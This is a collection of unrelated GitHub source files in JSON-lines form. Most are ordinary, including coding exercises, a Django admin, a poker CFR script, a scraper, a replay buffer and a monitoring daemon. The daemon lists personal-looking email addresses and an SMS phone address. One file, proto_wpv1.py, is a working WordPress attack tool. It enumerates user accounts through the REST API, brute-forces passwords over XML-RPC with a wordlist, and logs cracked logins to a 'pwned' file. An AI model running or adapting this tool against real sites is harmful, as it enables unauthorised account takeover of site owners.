모든 정수는 -1,000,000보다 크거나 같고, 1,000,000보다 작거나 같은 정수이다.\n\n출력\n각 테스트 케이스마다 주어진 정수 N개의 최솟값과 최댓값을 공백으로 구분해 한 줄에 하나씩 차례대로 출력한다.\n\n\n '''\ntc = int(input())\n\nfor _ in range(tc):\n int_n = int(input())\n li = list(map(int, input().split()))\n print(min(li),max(li))\n ","repo_name":"2023cote/2022cote_eunseo","sub_path":"implementation/04_20053.py","file_name":"04_20053.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23427105400","text":"import os, time\nimport signal\nimport smtplib\nfrom email.Header import Header\nfrom email.Utils import parseaddr, formataddr\nfrom email.mime.text import MIMEText\n\n\nMONITORING_DIR = '/var/pdffiller/pdffiller-stack/' # path of the directory which should be monitored\n\nTIME_LIMIT = 60 # time limit. if It was esceeded all processes with target_string in description will be stopped\n\nSUBJECT = \"Too long time for pdf processing\" # subject of notification mail\n\nMSG_TEXT = (\"Following files were processed \"\n \"longer then %d seconds: {{FILENAMES}}\" % TIME_LIMIT) # body of notification mail\n # {{FILENAMES}} is placeholder for list of file namess separated by semicolumn\n\nSERVER = \"localhost\" # mail server\n\nSENDER = u\"Monitoring bot <support@pdffiller.com>\" #sender address\n\nRECIPIENTS = [\"<koshevchenko@gmail.com>\",\n \"<6178773156@txt.att.net>\",\n \"<support@pdffiller.com>\"] #recipient addresses\n\nTARGET_STRING = 'swfdaemon_corrected' # processes with such string in description will be stopped\n # if time be exceeded\n\nHARD_STOP_SERVICE = False # Wheteher found services should be stopped or just notify via mail about time exceeding\n\nDAEMON_STOP_STRING = 'python /var/pdffiller/swfdaemon_corrected.py stop'\n\nDAEMON_START_STRING = 'python /var/pdffiller/swfdaemon_corrected.py start'\n\nNUMBER_OF_OUTDATED_FILES = 5 # min Number of outdated files when service should be restarted\n\ndef send_mail(server, sender, recipient, subject, body):\n msg = MIMEText(body)\n\n header_charset = 'ISO-8859-1'\n\n # Split real name (which is optional) and email address parts\n\n sender_name, sender_addr = parseaddr(sender)\n recipient_name, recipient_addr = parseaddr(recipient)\n\n # We must always pass Unicode strings to Header, otherwise it will\n # use RFC 2047 encoding even on plain ASCII strings.\n sender_name = str(Header(unicode(sender_name), header_charset))\n recipient_name = str(Header(unicode(recipient_name), header_charset))\n\n # Make sure email addresses do not contain non-ASCII characters\n sender_addr = sender_addr.encode('ascii')\n recipient_addr = recipient_addr.encode('ascii')\n\n # Create the message ('plain' stands for Content-Type: text/plain)\n #msg = MIMEText(msg.encode(body_charset), 'plain', body_charset)\n msg['From'] = formataddr((sender_name, sender_addr))\n msg['To'] = formataddr((recipient_name, recipient_addr))\n msg['Subject'] = Header(unicode(subject), header_charset)\n\n server = smtplib.SMTP(server)\n time.sleep(0.3)\n server.sendmail(sender, recipient, msg.as_string())\n server.quit()\n\ndef analize_dir(dir_name, time_limit):\n pathes = [os.path.join(dir_name, i) for i in os.listdir(dir_name)]\n change_times = [(i, time.time() - os.lstat(i).st_ctime) for i in pathes]\n return [f_n for f_n, c_t in change_times if c_t > time_limit]\n\nknown_files = set()\nwhile True:\n outdated_files = analize_dir(MONITORING_DIR, TIME_LIMIT)\n if len(outdated_files) >= NUMBER_OF_OUTDATED_FILES:\n msg = MSG_TEXT.replace('{{FILENAMES}}', 
'; '.join(outdated_files))\n if set(outdated_files) - known_files:\n for RECIPIENT in RECIPIENTS:\n send_mail(SERVER, SENDER, RECIPIENT, SUBJECT, msg)\n known_files.update(outdated_files)\n if HARD_STOP_SERVICE:\n f = os.popen('ps ax')\n processes = [i for i in f.readlines() if TARGET_STRING in i]\n f.close()\n process_ids = [int(i.strip().split(' ', 1)[0]) for i in processes]\n for pid in process_ids:\n os.kill(pid, signal.SIGKILL)\n else:\n os.system(DAEMON_STOP_STRING)\n os.system(DAEMON_START_STRING)\n time.sleep(1)\n","repo_name":"assasinbox/pdf2swf_converter","sub_path":"monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24551880656","text":"from pynput import keyboard\nfrom pynput.keyboard import Key\n\nl = None\n\ndef press(k):\n print(k)\n if k == Key.enter:\n l.stop()\n\nwith keyboard.Listener(on_press=press) as listener:\n l = listener\n listener.join()\n\n\nprint(\"end\")\n","repo_name":"BaumGmbH/python-projects","sub_path":"TypeRace Winner/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35509966875","text":"def binary_search(list,target):\n first = 0\n last = len(list)-1\n #any programming language is that way \n # floor division operator //\n while first <= last:\n midpoint = (first+last)//2\n # best case scenario \n # first is equal to the last \n if list[midpoint] == target:\n return midpoint\n elif list[midpoint] < target:\n first = midpoint+1\n else:\n last = midpoint - 1\n return None\n\ndef verify(index):\n if index is not None:\n print(\"Target found at index\",index)\n else:\n print(\"Target not found in list\")\n\n# if we have the empty loop the while is never activated\nnumbers= [1,2,3,4,5,6,7,8,9,10]\n\n# if the list not unsorted the binary search may not work\n\nresult = binary_search(numbers,6)\nverify(result)","repo_name":"davidsunjunjie/artifical_intelligence","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38899751373","text":"from django.contrib import admin\nfrom rest_framework.reverse import reverse_lazy\n\nfrom order.models import OrderItem, Order\n\nfrom utils.signals import new_order_confirmation\n\n\nclass OrderItemInline(admin.TabularInline):\n model = OrderItem\n extra = 0\n fields = ['assortment', 'price', 'quantity', 'get_company']\n readonly_fields = ['assortment', 'price', 'get_company']\n\n def get_readonly_fields(self, request, obj=None):\n if obj.status == Order.Status.NEW:\n return ['assortment', 'price', 'get_company']\n return ['assortment', 'price', 'quantity', 'get_company']\n\n\n@admin.register(Order)\nclass OrderAdmin(admin.ModelAdmin):\n inlines = [\n OrderItemInline\n ]\n list_display = ['id', 'status', 'date', 'get_items_count', 'get_items_sum']\n\n def save_form(self, request, form, change):\n order = Order.objects.get(id=request.resolver_match.kwargs.get('object_id'))\n if order.status == Order.Status.NEW and request.POST.get('status') == Order.Status.IN_PROGRESS:\n new_order_confirmation.send(\n sender=self.__class__,\n order_number=order.id,\n order_url=reverse_lazy('order-detail', request=request, args=[order.id]),\n to_address=order.recipient_email,\n last_name=order.recipient_last_name,\n 
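# the recipient name fields presumably feed the confirmation e-mail template sent by this signal\n                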
first_name=order.recipient_first_name,\n )\n return super(OrderAdmin, self).save_form(request, form, change)\n","repo_name":"Zippelin/DemoShop","sub_path":"docker/web/app/shop/order/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19163923459","text":"import os\nfrom itertools import combinations\n\n\nos.chdir('tasks/task27/homework/01_PairsStatic/n14/')\n\n\ndef solution(var):\n \"\"\"Анализ\n\n 12: * * 3 4\n 12: * 2 2 3\n\n \"\"\"\n f = open(f'27{var}.txt', mode='r')\n n = int(f.readline())\n m = [[] for _ in range(12)]\n for _ in range(n):\n x = int(f.readline())\n m[x % 12].append(x)\n\n a = []\n for i in range(12):\n m[i].sort()\n a.extend(m[i][-4:])\n \n ans = []\n for x, y, w, z in combinations(a, 4):\n if x * y * w * z % 12 == 0:\n ans.append(x + y + z + w)\n print(max(ans))\n \n\nsolution('A')\nsolution('B')","repo_name":"Richtermnd/Exams","sub_path":"tasks/task27/homework/01_PairsStatic/n14/n14.py","file_name":"n14.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10675383752","text":"from cfr import *\nfrom khun import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy as cp\n\ndef truth(alpha):\n s = {}\n s[\"J\"] = np.array([1 - alpha, alpha])\n s[\"Q\"] = np.array([1., 0.])\n s[\"K\"] = np.array([1 - 3*alpha, 3*alpha])\n s[\"Jp\"] = np.array([2./3, 1./3])\n s[\"Qp\"] = np.array([1., 0.])\n s[\"Kp\"] = np.array([0., 1.])\n s[\"Jb\"] = np.array([1., 0.])\n s[\"Qb\"] = np.array([2./3, 1./3])\n s[\"Kb\"] = np.array([0., 1.])\n s[\"Jpb\"] = np.array([1., 0.])\n s[\"Qpb\"] = np.array([2./3 - alpha, alpha + 1./3])\n s[\"Kpb\"] = np.array([0., 1.])\n return s\n\ndef distance(s1, s2):\n out = 0\n for i in s1:\n out += (s1[i][0] - s2[i][0])**2\n return out\n\ndef strat_diff_vs_it(game, T):\n strategy = {}\n cumulated_regret = {}\n cumulated_strategy = {}\n diff = np.zeros(T)\n for t in range(T):\n cards = game.deal()\n cfr_2p(game, cards, 0, 1, 1, strategy, cumulated_regret, cumulated_strategy)\n cfr_2p(game, cards, 1, 1, 1, strategy, cumulated_regret, cumulated_strategy)\n strat = cp(cumulated_strategy)\n if len(strat) >= 12:\n for infoset in strat:\n strat[infoset] /= np.sum(strat[infoset])\n diff[t] = distance(strat, truth(strat[\"J\"][1]))\n return diff\n\nif __name__ == \"__main__\":\n diff = strat_diff_vs_it(Khun(), 2000)\n plt.plot(diff)\n plt.ylabel(\"Sum of Squared Differences\")\n plt.xlabel(\"games\")\n plt.show()\n","repo_name":"vincentcouteaux/pokercfr","sub_path":"compare_khun.py","file_name":"compare_khun.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41047764789","text":"# Problem: https://adventofcode.com/2020/day/10#part2\n\nfrom pathlib import Path\nfrom functools import lru_cache\n\nINPUT = str(Path(__file__).parent.absolute()) + '/input.txt'\n\njolts = []\n\n# Changed to lru_cache after seeing better implementations\n@lru_cache(16)\ndef split_sum(jolts, curr):\n path = jolts[1:]\n # If diff <= 3, continue adding\n if jolts[0] - curr <= 3:\n # If its the end of the path, return adding 1\n if not path:\n return 1\n else: \n return (\n split_sum(path, jolts[0]) + split_sum(path, curr)\n )\n # No more paths left, diff > 3\n else:\n return 0\n\nwith open(INPUT) as f:\n for line in 
f.readlines():\n jolts.append(int(line))\n\n jolts.sort()\n\nprint(split_sum(tuple(jolts), 0))\n\n# Result: 86812553324672\n\n\n","repo_name":"gdep/AoC_2020","sub_path":"Python/Day10/Day10_02.py","file_name":"Day10_02.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6343119837","text":"import requests\nfrom bs4 import BeautifulSoup\nimport dateparser\nimport sqlite3\nfrom sys import argv\n\nUSE_CACHE = False\nSAVE_CACHE = False\nSHOW_PREVIEW = False\nDATABASE_NAME = 'data.sqlite'\nPER_PAGE = 1000\nMAX_PAGES = 10\n\n# Debug settings\nif 'debug' in argv:\n USE_CACHE = True\n SAVE_CACHE = True\n SHOW_PREVIEW = True\n MAX_PAGES = 1\n\nSERVER_ROOT = 'http://www.bs.ch'\nSEARCH_URL = '%s/publikationen/content/0.html?limit=%d&offset=%d&searchString=&from=egal&to=egal&organisationUnit=all&orderBy=year&orderType=DESC'\n\nfields = [\n 'title',\n 'subtitle',\n 'image',\n 'link'\n]\n\n\n\ndef save(c, pub_entries):\n for entry in pub_entries:\n entrydata = {\n 'title': None,\n 'subtitle': None,\n 'image': None,\n 'link': None\n }\n a_title = entry.find('td', { 'headers':'title' })\n a_title_anchor = a_title.find('dt').find('a')\n\n entrydata['title'] = a_title_anchor.get_text()\n entrydata['link'] = SERVER_ROOT + a_title_anchor.get('href')\n for dd in a_title.find_all('dd'):\n if not dd.get('class'):\n entrydata['subtitle'] = dd.get_text()\n elif 'image' in dd.get('class'):\n entrydata['image'] = dd.find('img').get('src')\n if entrydata['image'].startswith('/'):\n entrydata['image'] = SERVER_ROOT + entrydata['image']\n\n if SHOW_PREVIEW:\n print(entrydata)\n\n c.execute(\n '''\n INSERT INTO data (\n ''' + ','.join(fields) + '''\n )\n VALUES\n (''' + '?,'*(len(fields)-1) + '''?)\n ''',\n [\n entrydata['title'],\n entrydata['subtitle'],\n entrydata['image'],\n entrydata['link'],\n ]\n )\n\n\ndef run():\n # Set up a fresh database\n conn = sqlite3.connect(DATABASE_NAME)\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS data')\n fieldlist = \" text, \".join(fields)\n c.execute(\n 'CREATE TABLE data (' + fieldlist + ')'\n )\n conn.commit()\n\n # Download from cache\n if USE_CACHE:\n for page_count in range(0, MAX_PAGES):\n print (\"Collecting page %d\" % page_count)\n f = open('_cache/%d.html' % page_count, 'r')\n cache_data = f.read()\n soup = BeautifulSoup(cache_data, 'html.parser')\n rows = soup.select('tbody tr')\n save(c, rows)\n conn.commit()\n f.close()\n\n # Retrieve from server\n else:\n page_count = 0\n while page_count <= MAX_PAGES:\n print (\"Collecting page %d\" % page_count)\n url = SEARCH_URL % (SERVER_ROOT, PER_PAGE, page_count * PER_PAGE)\n page = requests.get(url)\n if 'Keine Publikationen gefunden' in page.text:\n break\n if SAVE_CACHE:\n fw = open('_cache/%d.html' % page_count, 'w')\n fw.write(page.text)\n print (\"Cached page %d\" % page_count)\n fw.close()\n soup = BeautifulSoup(page.content, 'html.parser')\n rows = soup.select('tbody tr')\n save(c, rows)\n conn.commit()\n page_count = page_count + 1\n\n conn.close()\n\n\nrun()\n","repo_name":"loleg/kanton-basel-stadt-pdf-publikationen","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8658028927","text":"from django.urls import path\n\nfrom home.average import CityAveragePriceAPIView\nfrom .apis import RoomDetailApiView, RoomApiView, BookingAPIView, BookingCancelAPIView, \\\n 
UserReviewListAPIView, RoomReviewListAPIView, AmenityAPIView, RoomListingApiView, ReviewCreateListAPIView, \\\n ReviewDelPatchAPIView, ReceiptAPIView\n\nurlpatterns = [\n path('rooms/', RoomListingApiView.as_view()),\n path('listings/<int:pk>/', RoomDetailApiView.as_view(), name='room-detail'),\n path('listings/', RoomApiView.as_view(), name='room-list-generic'),\n path('booking/', BookingAPIView.as_view(), name='booking'),\n path('booking_cancel/', BookingCancelAPIView.as_view(), name='booking-cancel'),\n path('review/user/list/', UserReviewListAPIView.as_view(), name='review-user-list'),\n path('review/room/list/', RoomReviewListAPIView.as_view(), name='review-room-list'),\n path('review/<int:room_id>/', ReviewCreateListAPIView.as_view(), name='review-create'),\n path('review/del-patch/', ReviewDelPatchAPIView.as_view(), name='review-del-patch'),\n path('amenities/', AmenityAPIView.as_view(), name='amenity-view'),\n path('average/', CityAveragePriceAPIView.as_view(), name='average'),\n path('receipt/<int:pk>/', ReceiptAPIView.as_view(), name='receipt'),\n]\n","repo_name":"seongwonhan88/fc-airbnb","sub_path":"app/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25057242887","text":"#特定の名前のシートを移動する(シートを先頭へ移動)\r\n\r\nfrom openpyxl import load_workbook\r\n\r\nwb = load_workbook(\"チェックリスト.xlsx\")\r\n#対象ファイルの選択\r\n\r\nfor ws in wb.worksheets:\r\n ws.sheet_view.tabSelected = None\r\n#default選択のシートをオフにする。オフにしなければアクティブなシートはまとめシートとグループ化される。\r\n\r\nws_matome = wb[\"まとめ\"]\r\n#シートの現在地を基準とした移動しかできないので、\"まとめ\"シートを変数にする\r\n\r\nwb.move_sheet(ws_matome, offset=-wb.index(ws_matome))\r\n\r\nwb.active = 0\r\n#先頭のシートを選択\r\n\r\nwb.save(\"チェックリスト_変更後.xlsx\")\r\n","repo_name":"jun-yoshiyoshi/python_for_excel","sub_path":"move_top_sheet.py","file_name":"move_top_sheet.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20198796051","text":"#!/usr/bin/python\n#coding: utf-8\n\nimport argparse as arg\nimport sys,time,requests,json,thread\n\nprint(''' \n ____ __ _ __\n / __ \\_________ / /_____| | / /___ __ _____ \n / /_/ / ___/ __ \\/ __/ __ \\ | /| / / __ `/ | / / _ \\\n\n / ____/ / / /_/ / /_/ /_/ / |/ |/ / /_/ /| |/ / __/\n/_/ /_/ \\____/\\__/\\____/|__/|__/\\__,_/ |___/\\___/ \n v1.1\n\n[!] Brute Force Wordpress\n[!] 
Desenvolvido por ./Cryptonking (B4l0x)\n''')\n\nparser = arg.ArgumentParser(description=\"Wordpress brute/scan by B4l0x\")\nparser.add_argument(\"--url\", \"-u\", help=\"Site wordpress\", required=True, type=str)\nparser.add_argument(\"--wordlist\", \"-w\", help=\"Wordlist de senhas\", required=True, default=\"wordlist.txt\", type=str)\nparser.add_argument(\"--usuario\", help=\"Usuario alvo\", default=\"null\", required=False, type=str)\nparser.add_argument(\"--tempo\", \"-t\", default=\"1\", help=\"Time sleep usado no Thread\", required=False, type=int)\nx = parser.parse_args()\nsite = x.url\n\nsite.replace(\"https://\", \"http://\")\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36', 'Cookie': 'humans_21909=1'}\nusuarios = []\nwordpressOK = []\nconfirmado= []\nalocthread = thread.allocate_lock()\n\ndef verwp():\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n print(\"[{} INFO] Confirmando site wordpress...\").format(tempo)\n try:\n response = requests.get(site+\"/xmlrpc.php\", timeout=20, headers=header).text\n logins = requests.get(site+\"/wp-json/wp/v2/users\", timeout=20, headers=header).text\n except Exception as e:\n print(\"[{} INFO] Host nao pode ser resolvido erro: {}\").format(tempo, e)\n exit()\n if \"XML-RPC\" in response:\n print(\"[{} INFO] URL {} [XMLRPC] [OK]\").format(tempo,site)\n if \"slug\" in logins:\n print(\"[{} INFO] URL {} [LOGIN] [OK]\").format(tempo,site)\n confirmado.append(\"1\")\n wordpressOK.append(site)\n else:\n print(\"[{} INFO] URL {} [LOGIN API OFF]\").format(tempo,site)\n exit()\n elif \"cptch_input\" or not \"XML-RPC server accepts POST requests only.\" or \"Not Found\" or \"404\" in response:\n print(\"[{} INFO] URL {} [XMLRPC Bloqueado]\").format(tempo,site)\n print(response)\n exit()\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(tempo)\n exit()\n except Exception as e:\n print(\"[{} INFO] Host nao pode ser resolvido erro: {}\").format(tempo, e)\n exit()\n\ndef capturausuarios():\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n if confirmado[0] != \"\":\n try:\n print(\"\\n[{} INFO] Inciando busca de usuario(s)...\").format(tempo)\n for site in wordpressOK:\n response = requests.get(site+\"/wp-json/wp/v2/users\", timeout=5, headers=header).text\n if \"slug\" in response:\n dados = json.loads(response)\n for user in dados[0:40]:\n print(\"[{} INFO] Usuario(s) encontrado(s): {}\").format(tempo,user['slug'])\n usuarios.append(user['slug'])\n print(\"\")\n elif not \"slug\" in response:\n print(\"[{} INFO] Nao foi possivel encontrar usuario(s) nessa url: {}\").format(tempo,url)\n except Exception as e:\n print(\"[{} INFO] Erro ao obter usuarios, seu teste sera inciado usando admin {}\").format(tempo, e)\n usuarios.append('admin')\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(tempo)\n exit()\n except:\n print(\"[{} INFO] Falha ao confirmar site wordpress...\").format(tempo)\n exit()\n \ndef brute(i):\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n for site in wordpressOK:\n senha = i.replace(\"\\n\", \"\")\n response = requests.get(site+\"/xmlrpc.php\", timeout=10, headers=header).text\n if \"XML-RPC server accepts POST requests only.\" in response:\n for usuario in usuarios:\n payload='''<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>'''%(usuario,senha) 
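\n                    # note: a response containing 'isAdmin' means the credentials are valid (checked below)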
\n r = requests.post(site+\"/xmlrpc.php\", data=payload, timeout=30, headers=header).text\n if 'isAdmin' in r:\n alocthread.acquire()\n print(\"\\n\\t[{} LOGIN EFETUADO COM SUCESSO] URL: {} <=> {}:{}\\n\").format(str(tempo),site,usuario,senha)\n f = open(\"wp-pwned.txt\", \"a\")\n f.write(site+\" => \"+usuario+\" => \"+senha+\"\\n\")\n f.close()\n break\n alocthread.release()\n elif 'faultString' in r:\n alocthread.acquire()\n print(\"[{} FALHOU] URL: {} <=> {}:{}\").format(str(tempo),site,usuario,senha)\n alocthread.release()\n elif 'Not Acceptable!' in r:\n alocthread.acquire()\n print(\"[{} FIREWALL] URL: {}\").format(str(tempo),site)\n exit()\n break\n alocthread.release()\n else:\n break\n elif \"cptch_input\" or not \"XML-RPC server accepts POST requests only.\" or \"Not Found\" or \"404\" in response:\n print(\"[{} XMLRPC BLOQUEADO] URL {} <=> {}:{}\").format(str(tempo),site,usuario,senha)\n exit()\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(str(tempo))\n exit()\n except Exception as e:\n print(\"[{} INFO] Conexao perdida com o host, Reconectando...\").format(str(tempo))\n exit()\n \nif(x.usuario == \"null\"):\n verwp()\n capturausuarios()\nelif(x.usuario != \"null\"):\n tempo = time.strftime(\"%H:%M:%S\")\n verwp()\n wordpressOK.append(site)\n confirmado.append(\"1\")\n usuarios.append(x.usuario)\n print(\"[{} INFO] Brute force sera inciado usando login {}\\n\").format(tempo,x.usuario)\n\ntry:\n try:\n wordlist = open(x.wordlist, 'r').readlines()\n except:\n tempo = time.strftime(\"%H:%M:%S\")\n print(\"[{} INFO] Verifique o caminho da wordlist e tente novamente...\").format(tempo)\n exit()\n for i in wordlist:\n time.sleep(0.+x.tempo)\n thread.start_new_thread(brute, (i,))\nexcept KeyboardInterrupt:\n tempo = time.strftime(\"%H:%M:%S\")\n print(\"\\n\\t[{} INFO] Finalizado, obrigado por usar by B4l0x...\\n\").format(tempo)\n exit()\n","repo_name":"truesamurai/WordPress-BruteForce-1.1","sub_path":"proto_wpv1.py","file_name":"proto_wpv1.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42001318852","text":"from typing import List, Tuple, Union\n\nfrom numpy import ndarray, zeros\nfrom torch import Tensor, cat, tensor\nfrom torch import float32 as t_float32\nfrom numpy import float32 as n_float32\nfrom numpy.random import choice as n_choice\n\nfrom classes.utils.Globals import Globals\n\n\nclass ReplayBuffer:\n __CAPACITY: int\n __ALPHA: float\n\n __priorities: ndarray\n __buffer: List[Union[None, Tuple[Tensor, Union[None, int], float, Tensor, bool]]]\n __index: int\n\n def __init__(self, capacity: int, alpha: float):\n self.__CAPACITY = capacity\n self.__ALPHA = alpha\n\n self.__buffer = []\n self.__index = 0\n self.__priorities = zeros((capacity,), dtype=n_float32)\n\n def __len__(self) -> int:\n return len(self.__buffer)\n\n def clear_memory(self) -> None:\n self.__buffer = []\n self.__index = 0\n self.__priorities = zeros((self.__CAPACITY,), dtype=n_float32)\n\n def update_priorities(self, indices: List[int], priorities: ndarray) -> None:\n for index, priority in zip(indices, priorities):\n self.__priorities[index] = priority\n\n def __store(self, memory: Tuple[Tensor, Union[None, int], float, Tensor, bool]) -> None:\n if self.__len__() < self.__CAPACITY:\n self.__buffer = [*self.__buffer, memory]\n return\n self.__buffer[self.__index] = memory\n\n def store_memory(self, state: Tensor, action: Union[int, None], reward: float, 
next_state: Tensor,\n                     is_done: bool) -> None:\n        # if buffer is not empty get max priority\n        maximum_priority: n_float32 = self.__priorities.max() if self.__buffer else n_float32(1.0)\n        # store memory and corresponding priority\n\n        self.__store(memory=(state, action, reward, next_state, is_done))\n        self.__priorities[self.__index] = maximum_priority\n        # update index\n        self.__index = (self.__index + 1) % self.__CAPACITY\n\n    def get_sample(self, amount_of_memories: int, beta: float) -> Tuple[Tensor, Tensor, Tensor,\n                                                                        Tensor, Tensor, List[int], Tensor]:\n        # compute probabilities\n        priorities: ndarray = self.__priorities if self.__len__() == self.__CAPACITY else \\\n            self.__priorities[:self.__index]\n        probabilities: ndarray = (priorities ** self.__ALPHA) / (priorities ** self.__ALPHA).sum()\n\n        # retrieve samples from buffer\n        memories_indices: ndarray = n_choice(self.__len__(), amount_of_memories, p=probabilities)\n        memories_sample: List = [self.__buffer[idx] for idx in memories_indices]\n\n        # compute weights\n        tmp_weights: ndarray = (self.__len__() * probabilities[memories_indices] ** (-beta))\n        tmp_weights /= tmp_weights.max()\n        weights: Tensor = tensor(tmp_weights, requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n        del tmp_weights\n\n        batch = list(zip(*memories_sample))\n        states = cat(batch[0]).to(Globals.DEVICE_TYPE)\n        actions = tensor(batch[1], requires_grad=False).to(Globals.DEVICE_TYPE)\n        rewards = tensor(batch[2], requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n        next_states = cat(batch[3]).to(Globals.DEVICE_TYPE)\n        # data type as float to convert into numbers\n        terminals = tensor(batch[4], requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n\n        return states, actions, rewards, next_states, terminals, memories_indices, weights\n","repo_name":"taciochi/FYP","sub_path":"classes/data/memory/ReplayBuffer.py","file_name":"ReplayBuffer.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18406155929","text":"from itertools import accumulate; import math; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\ndef getBST(x,y): return BSTIterator(x,y)\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\nclass BSTIterator:\n    def __init__(self, root: Optional[TreeNode],forward): # if forward is True-> get nodes in increasing order else in decreasing order\n        self.st=[]\n        self.forward=forward\n        self.add(root)\n    def add(self, node):\n        while node:\n            self.st.append(node)\n            if self.forward:\n                node=node.left\n            else:\n                node=node.right\n    def next(self) -> int:\n        node=self.st.pop()\n        if self.forward:\n            self.add(node.right)\n        else:\n            self.add(node.left)\n        return node.val\n    def hasNext(self) -> bool:\n        return len(self.st)!=0\n\nclass Solution:\n    # binary search tree iterator\n    def findTarget(self, root: TreeNode, target: int) -> bool:\n        l=BSTIterator(root,True) # get nodes in increasing order\n        r=BSTIterator(root,False) # get nodes in decreasing order\n        i=l.next()\n        j=r.next()\n        while i<j:\n            summ=i+j\n            
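# two-pointer over the two BST iterators: move whichever end brings the sum toward the target\n            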
if summ==target:\n return True\n if summ<target:\n i=l.next()\n else:\n j=r.next()\n return False\nclass Solution2:\n # bad solution\n def findTarget(self, root: TreeNode, target: int) -> bool:\n sett = set()\n def preorder(root:TreeNode):\n if not root:return False\n if root.val in sett:return True\n sett.add(target-root.val)\n return preorder(root.left) or preorder(root.right)\n return preorder(root)\n\nclass Tester(unittest.TestCase):\n def do_test(self,commands, inputs):\n outputs = []\n obj = \"\"\n for i,cmd,input in zip(range(len(inputs)),commands,inputs):\n if cmd=='BSTIterator': obj = getBST(des(input[0]),True); outputs.append(None)\n elif cmd=='next': outputs.append(obj.next())\n elif cmd=='hasNext': outputs.append(obj.hasNext())\n return outputs\n def test01(self):\n commands = [\"BSTIterator\",\"next\",\"next\",\"hasNext\",\"next\",\"hasNext\",\"next\",\"hasNext\",\"next\",\"hasNext\"]\n inputs=[[[7,3,15,None,None,9,20]],[],[],[],[],[],[],[],[],[]]\n expected = [None, 3, 7, True, 9, True, 15, True, 20, False]\n outputs = self.do_test(commands, inputs)\n self.assertEqual(expected,outputs)\nclass mytestcase(unittest.TestCase):\n def test01(self):\n self.assertEqual(True,get_sol().findTarget(des([5,3,6,2,4,None,7]), 9))\n def test02(self):\n self.assertEqual(False,get_sol().findTarget(des([5,3,6,2,4,None,7]), 28))\n # def test03(self):\n # def test04(self):\n # def test05(self):\n # def test06(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc653.py","file_name":"lc653.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14233411870","text":"# python3\nimport itertools\n\nINF = float('Inf')\n\ndef read_data():\n n, m = map(int, input().split())\n graph = [[INF] * n for _ in range(n)]\n for _ in range(m):\n u, v, weight = map(int, input().split())\n u -= 1\n v -= 1\n graph[u][v] = graph[v][u] = weight\n return graph\n\ndef print_answer(path_weight, path):\n if path_weight == INF:\n print('-1')\n else:\n print(path_weight)\n print(' '.join(map(str, path)))\n\ndef optimal_path(graph):\n n = len(graph)\n C = {}\n\n def get_distance(vertices, last_vertex):\n key = tuple(sorted(vertices))\n if key not in C:\n return INF\n return C[key][last_vertex]\n\n def set_distance(vertices, last_vertex, distance):\n key = tuple(sorted(vertices))\n if key not in C:\n C[key] = [INF] * n\n C[key][last_vertex] = distance\n\n\n set_distance((0,), 0, 0)\n for s in range(1, n):\n for S_ in itertools.combinations(range(1,n), s):\n S = (0,) + S_\n\n # Each new combination can be investigated by looking at\n 